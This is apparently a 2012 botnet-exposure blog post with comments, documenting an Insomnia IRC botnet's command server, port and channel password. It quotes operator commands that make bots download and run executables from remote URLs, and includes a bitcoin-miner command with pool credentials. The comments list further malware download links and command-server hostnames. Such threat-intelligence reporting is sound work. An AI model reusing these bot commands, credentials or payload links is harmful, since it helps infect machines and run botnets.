vandersand.no-ip.biz (Insomnia ircbot hosted by United States Clarks Summit Volumedrive)

By I_Post_Ur_Info, September 7, 2012

Resolved vandersand.no-ip.biz to 199.115.230.138

Server: vandersand.no-ip.biz
Port: 6654
Channel: #Insomnia
Channel password: frosty
* Topic for #Insomnia is: .up hxxps://dl.dropbox.com/u/21829907/botseller.exe 449C6FB8390C7148B075A52EBEBAB4F5
* Topic for #Insomnia set by lucky at Thu Sep 06 22:08:10 2012
Botnick: {IT|XP-32a}uwryxvf

While I was in the channel he downloaded a bitcoin miner
Dextermania.exe hxxp://versx.net/x/bcm/bitcoin-miner.exe
http://pool.bitclockers.com:8332 -u Dexter -p 19930924

Hosting infos: http://whois.domaintools.com/199.115.230.138

Thanks to anonymous commentor for the file

Edit:
Good installs would buy again 100%
<Lucky> .ruskill on
<Lucky> .dl hxxps://dl.dropbox.com/u/26953589/HackForums/Servers/paelex/svchost.exe -t 100000

Categories: Uncategorized

Tags: Bitcoin Miner Botnetinsomnia

Previous posthacking-scene.ru (Athena ircbot hosted by Romania Voxility S.r.l.)

Next postMystical Megapost (Botnets of all types) (Hosted by Ukraine Ukrainian Internet Names Center Ltd and Netherlands Maasdijk Worldstream)

5 Comments

Anonymous - September 9, 2012 at 5:56 pm

Here is another one i believe smoke loader http://screen-viewer.com/uploads/629490819.scvhost32.exe

Anonymous - September 9, 2012 at 10:48 pm

thats my botnet LOL

Anonymous - September 10, 2012 at 3:14 am

good find tho

Anonymous - September 10, 2012 at 2:56 pm

Insomnia i believe https://dl.dropbox.com/u/50189956/HaxUnitClient.exe

Pig - September 10, 2012 at 4:49 pm

conects here :gotoel.no-ip.biz

illuminati.sx (Plasma http botnet hosted by worldstream.nl)

meziamussucemaqueue.su (Betabot http botnet hosted by sunnyvision.com)

www.paloshke.org (Solar http botnet hosted by ghandi.net)